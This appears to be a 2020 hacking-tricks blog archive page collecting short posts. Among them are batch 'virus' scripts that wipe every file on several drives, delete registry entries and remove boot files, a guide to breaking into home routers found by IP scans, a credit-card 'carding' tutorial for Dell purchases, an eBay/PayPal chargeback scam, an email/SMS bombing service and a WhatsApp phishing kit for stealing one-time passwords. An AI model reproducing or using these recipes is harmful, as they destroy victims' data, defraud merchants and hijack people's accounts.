Posts

Showing posts from May, 2020
TOP 20 VIRUS COMMAND'S IN NOTEPAD Method 1: Just open your notepad 1) Click start -> all programs -> accessories -> notepad 2) Or just press or click windows key + r :: run window will open and type notepad and hit enter . NOW TYPE THE FOLLOWING CODE :: @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Then save it as kinng.bat and the batch file is created . WARNING :: This is the most dangerous virus! Be careful with its use. Delete the entire registry @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* Now save it as kinng.bat and the batch file is created . Method 2: How to crash a PC Forever !::: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.
Free PUBG Keys From Ebay   Company Name : eBay Email, or contact Form : N/A Value : ? Country tested : USA Difficulty : Easy  Step 1: Go on eBay.com and search for a PUBG Steam key. Make sure the shipment method is virtual NOT PHYSICAL. Step 2: Buy it, don't worry you'll get your money back. I personally think using paypal makes this method faster but you can still use other payment methods. Step 3: once the seller messages you the code, use it! Step 4: Start a dispute(On paypal if you used paypal, on eBay if you didn't use paypal) and say that you received a virtual item.Ebay doesn't accept them. Step 5: Escalate the dispute and it will go in your favor because the item shouldnt even be listed on ebay seeing how it is against their policy. DONE! Once the dispute is finished you get your money back and you already used the code so the game isn't on your steam account!  (works for anything virtual and redeemable really, just another commonsense
​ HOW TO RUN .EXE FILE IN ANDROID Files with the EXE extension are executable files intended for use within Windows or MS-DOS. You can't make all EXE files work on an Android. However, many older DOS-based EXE files can be opened with the DOS emulator DOSBox. ♦️ Step 1 Install a DOSBox app on your Android device. AnDOSBox, aDosBox and DosBox Turbo are three different DOSBox apps available from the Google Play store. ♦️ Step 2 Open the DOSBox app. ♦️ Step 3 Type "cd \foldername" into the command line, where "foldername" denotes the folder in which your EXE is contained. For example, if your EXE is in the Download folder, type "cd \download." ♦️ Step 4 Click Enter on your Android keyboard. ♦️ Step 5 Enter the name of the EXE file. You do not need to enter the .exe extension. ♦️ Step 6 Tap "Enter" on your Android keyboard CREDIT :- @MALIK0786
How to Hack the Home Routers and gain the Admin Right Requirements: Port Scanner (zenmap,superscan or unicornscan.I use Zenmap) Web Browser (Chrome,Firfox or Safari) Internet Connection(Any kind of Internet connection) First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap. Instruction on How to Hack the Home Routers and gain the Admin Rights… 1. We should select an IP range. I have selected IP range that includes my public IP address. XXX.XXX.30.0-XXX.XXX.30.255 2. Now let’s scan for home routers. When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23). I have found many IP addesses with port 80 is opened. So I stopped my scan. 3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log
​​ Snallygaster – Scan For Secret Files On HTTP Servers snallygaster is a Python-based tool that can help you to scan for secret files on HTTP servers, files that are accessible that shouldn’t be public and can pose a security risk. Typical examples include publicly accessible git repositories, backup files potentially containing passwords or database dumps. In addition it contains a few checks for other security vulnerabilities. 🌐Download: https://bit.ly/3c5c6AP CREDIT :- @MALIK0786
This summary is not available. Please click here to view the post.

Earn Money While You Sleep And Free

EARN MONEY WHILE YOU SLEEP AND FREE FLOODCRM INVITES! Spam E-mails and SMS #onlinemoneymakingtutorial #mostrequested FloodCRM is one of the BEST automated email/SMS bombing service available out there on internet, at the cheapest rates. Flood any email with up to 70000 emails. However, to create an account an invitation code is required. 1. Open the following link in a tab: http://floodcrm.net/user/registration.html As you see an invitation code is required to create your account. 2. Open the following link in another new tab:  https://floodcrminvites.xyz/register.php This generator creates unlimited invitation codes for you to use for FREE. 3. Fill in the fields - Username, password and type any e-mail - it may as well be a ThrowAwayMail or any other temporary e-mail provider. 4. Register your account and login to the site again 5. You should now see the following: Spoiler Show Here, press the blue "Generate" button and copy the invitation code you

How to Access DarkWeb

How to Access DarkWeb ◼️Steps ⭕️There are many ways to access the dark web. Being a part of the deep net, dark web operates differently than the clear-net, and needs special client software to be accessed. While there are multiple ways to access the dark web, the most common and recommended method involves using TOR, and then visiting the .onion websites. All dark web website have a URL with .onion domain, which looks similar to the way the clear-net websites have .com, .org, .net, etc. Once you have TOR and find out the .onion address of a deep web site (hidden web site),you can simply enter it in the URL bar on TOR browser, and it'll open, just as normal websites open in usual browsers. ⭕️ If you read the previous boring section, you'd see that I mentioned how the dark net often uses uncommon communication protocols, etc. In case of the dark web, we see that phenomenon with respect to the onion websites. I won't go in much depth, but first look at a .onion URL sugge

How To Access Deep Web What You Need To Know

HOW TO ACCESS DEEP WEB  WHAT YOU NEED TO KNOW (2020 ) πŸ“How to access the deep web? πŸ’’(Warning: the content of this publication is purely informative, you are solely responsible for what you do with that information).πŸ’’  This means that in a conventional way it is not possible to access these services which opens up a whole market of possibilities for illegal operations and any type of task that requires certain anonymity. πŸ“NoteπŸ”» It is not as tough as you think. But, you can’t just access the deep/dark web like a normal web using a normal browser despite your need to use an anonymity software like Tor, which only accesses .Onion Links. Using Tor Browser, you can browse the deep web anonymously. But, that isn’t enough, you need an extra protection to secure your identity on the invisible web. Because it contains dangerous links which may breach the security. What can you find in the deep web?​ In addition you can find almost anything, an example of this are the online mar

How To Card Dell Laptops And Products

Image
How to card Dell something to prepare: 1. Fresh Drop (if ur drop is blacklist in DELL u won't pass even ur CC is good) 2. Good CCV (non-VBV or non-MSC) 3. Sock / VPN / SSH / VPS (tis not important, but good sock at same state of CC is better) Now, let start A - If You Want To Make Only Single Order With Single Cvv2 ( Which is Valid and virgin Ofcourse !! ) 1- first check the cc and make sure its Valid .. choose Your Item (Fast-track items) 2- Click On Add To Cart Then Check Out , You Will Be Prompted To Sign Up For A New User Or Sign In If You Have An Existing Account ( Sign Up For A New Account ) 3- Enter The First And Last Name For Your Drop As The Account First And Last Name In The Sign Up Page , Provide A Valid Email address And Password . 4- Youll Be Redirected To The Shipping Info Page , Youll Find The First Name and Last Name Provided In The Sign Up Page Stored There , Just Add The Address and Other Info *Note : You Dont Have To Provide

Hack WhatsApp Without Touching

Make Access On WhatsApp Accounts With Phishing Attack! ♨️In WhatsApp-Phishing hacker or attacker send a fake login page of whatsapp to victim and once victim enter their phone number and OTP (One Time Password) then attacker or hacker can retrieve it and access victim account.♨️ Requirements:-πŸ‘‡ Apache Server Ngrok Root Installation Of WhatsApp-Phishing $ git clone  tool link $ cd whatsapp-phishing $ sudo bash Whatsapp.sh Now enter your details and it will generate a phishing link for you send it to victim and phish their credentials. Note :- This information is only for educational purpose I am not responsible for any illegal activities performed by you ⚜️SHARE AND SUPPORT⚜️ *credit:- @MALIK0786